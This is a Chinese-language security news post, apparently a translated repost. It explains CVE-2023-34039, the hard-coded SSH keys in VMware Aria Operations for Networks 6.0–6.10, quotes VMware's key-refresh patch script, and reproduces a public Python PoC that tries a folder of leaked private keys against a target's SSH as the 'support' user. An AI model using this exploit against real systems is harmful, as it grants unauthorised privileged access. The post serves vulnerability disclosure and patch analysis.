VMware Aria【CVE-2023-34039】漏洞利用PoC

admin 2024年8月7日22:45:44评论27 views字数 4235阅读14分7秒阅读模式

背景介绍

Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation. VMware has evaluated the severity of this issue to be in the critical severity range with a maximum CVSSv3 base score of 9.8 CVE-2023-34039.
由于缺乏唯一的加密密钥生成,Aria Operations for Networks 包含身份验证绕过漏洞, VMware 已评估此问题的严重性处于关键严重范围内,CVSSv3 评分为 9.8, CVE-2023-34039。

ProjectDiscovery 的安全研究人员 Harsh Jaiswal (@rootxharsh) 和 Rahul Maini (@iamnoooob) 向 VMWare 报告了该漏洞。

同时VMware还提到:

具有 Aria Operations for Networks 网络访问权限的恶意行为者可以绕过 SSH 身份验证来访问 Aria Operations for Networks CLI。

有趣的是,VMware 将此漏洞命名为“网络身份验证绕过”,但在原作者看来,没有任何内容被绕过,虽然有 SSH 身份验证,但VMware 忘记了重新生成密钥。

看完以上两个描述后,原作者意识到这一定是 SSH 密钥硬编码问题, VMware 的 Aria Operations for Networks 已将其密钥从版本 6.0 硬编码到了 6.10。

补丁分析

VMware 已发布多个补丁文件供用户应用于其实例。这些补丁中的众多文件之一就是 bash 脚本。

refresh_ssh_keys() {

log "Remove old public key from authorized_keys file for support user"

chmod 666 /home/support/.ssh/authorized_keys

sed -i "s#$(sudo cat /home/support/.ssh/id_rsa_vnera_keypair.pub)##" /home/support/.ssh/authorized_keys

 

log "Remove old keys"

rm -f /home/support/.ssh/id_rsa_vnera_keypair

rm -f /home/support/.ssh/id_rsa_vnera_keypair.pub

rm -f /home/ubuntu/.ssh/id_rsa_vnera_keypair

rm -f /home/ubuntu/.ssh/id_rsa_vnera_keypair.pub

 

log "Generate new keypair for support user"

ssh-keygen -q -t rsa -f /home/support/.ssh/id_rsa_vnera_keypair -N ''

 

log "Copy new keys for ubuntu user"

cp /home/support/.ssh/id_rsa_vnera_keypair /home/ubuntu/.ssh/

cp /home/support/.ssh/id_rsa_vnera_keypair.pub /home/ubuntu/.ssh/

 

log "Add new public key file to home/support/.ssh/authorized_keys"

cat /home/support/.ssh/id_rsa_vnera_keypair.pub >> /home/support/.ssh/authorized_keys

chown support:support /home/support/.ssh/authorized_keys

 

log "Provide right permissions to ssh files generated"

chmod 400 /home/support/.ssh/id_rsa_vnera_keypair

chmod 400 /home/support/.ssh/id_rsa_vnera_keypair.pub

chmod 640 /home/support/.ssh/authorized_keys

chown support:support /home/support/.ssh/id_rsa_vnera_keypair

chown support:support /home/support/.ssh/id_rsa_vnera_keypair.pub

 

chmod 400 /home/ubuntu/.ssh/id_rsa_vnera_keypair

chmod 400 /home/ubuntu/.ssh/id_rsa_vnera_keypair.pub

chown ubuntu:ubuntu /home/ubuntu/.ssh/id_rsa_vnera_keypair

chown ubuntu:ubuntu /home/ubuntu/.ssh/id_rsa_vnera_keypair.pub

 

log "Remove Empty Lines from authorized_keys files"

sed -i '/^$/d' /home/support/.ssh/authorized_keys

 

}

generic

1.68 KB

© Guge's Blog


可以看到 refresh_ssh_keys 函数负责覆盖 support 和 ubuntu 用户当前的 SSH 密钥,值得注意的是,两个用户都拥有相同的密钥,并且同属 sudoers 组,没有任何限制。

寻找‘密钥’

利用此漏洞的主要挑战是 VMware 的 Aria Operations for Networks 的每个版本都具有唯一的 SSH 密钥,为了创建一个功能齐全的漏洞利用程序,必须收集该产品不同版本的所有密钥,经过一段时间,原作者终于收集到了6.0到6.10版本的所有密钥,最新版本 6.11 不容易受到此问题的影响,因为 VMware 在发布之前已修复了该问题。

该产品在实现时由两个节点组成,一个称为 Platform ,另一个称为 Collector ,基本上是两台不同的机器,漏洞利用程序包含所有版本中这两个节点的密钥。

漏洞验证(PoC)演示

视频演示请点击下方“阅读原文”跳转观看。

PoC代码

目前该代码已在GitHub公开。

"""

VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

Version: All versions from 6.0 to 6.10

Discovered by: Harsh Jaiswal (@rootxharsh) and Rahul Maini (@iamnoooob) at ProjectDiscovery Research

Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

A root cause analysis of the vulnerability can be found on my blog:

https://summoning.team/blog/vmware-vrealize-network-insight-ssh-key-rce-cve-2023-34039/

"""

import argparse

import os

import subprocess

 

parser = argparse.ArgumentParser()

parser.add_argument('--target', '-t', help='Target IP address (192.168.1.1)', required=True)

parser.add_argument('--port', '-p', help='Target SSH Port', default='22', required=False)

args = parser.parse_args()

 

print("""(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

 

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

""")

 

def sanity_check():

if os.name == 'posix':

os.system('chmod -R 700 keys/')

 

def exploit():

for root, dirs, files in os.walk("keys"):

for file in files:

key_file = str(os.path.join(root, file))

print(f"(*) Trying key: {key_file}n")

ssh_command = ['ssh', '-i', key_file, 'support@' + args.target, '-p', args.port, '-o', 'StrictHostKeyChecking=no', '-o', 'UserKnownHostsFile=/dev/null', '-o', 'BatchMode=yes', '2>/dev/null']

try:

ssh_command = ' '.join(ssh_command)

coutput = os.system(ssh_command)

except Exception as e:

log = f"(-) Failed connecting to {args.target}:{args.port} with key {key_file}!"

continue

sanity_check()

exploit()

generic

1.71 KB

© Guge's Blog


原文出处:https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

内容由骨哥翻译并整理。

 

原文始发于微信公众号(骨哥说事):研究人员公布VMware Aria【CVE-2023-34039】漏洞利用PoC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月7日22:45:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VMware Aria【CVE-2023-34039】漏洞利用PoChttps://cn-sec.com/archives/2002370.html

发表评论

匿名网友 填写信息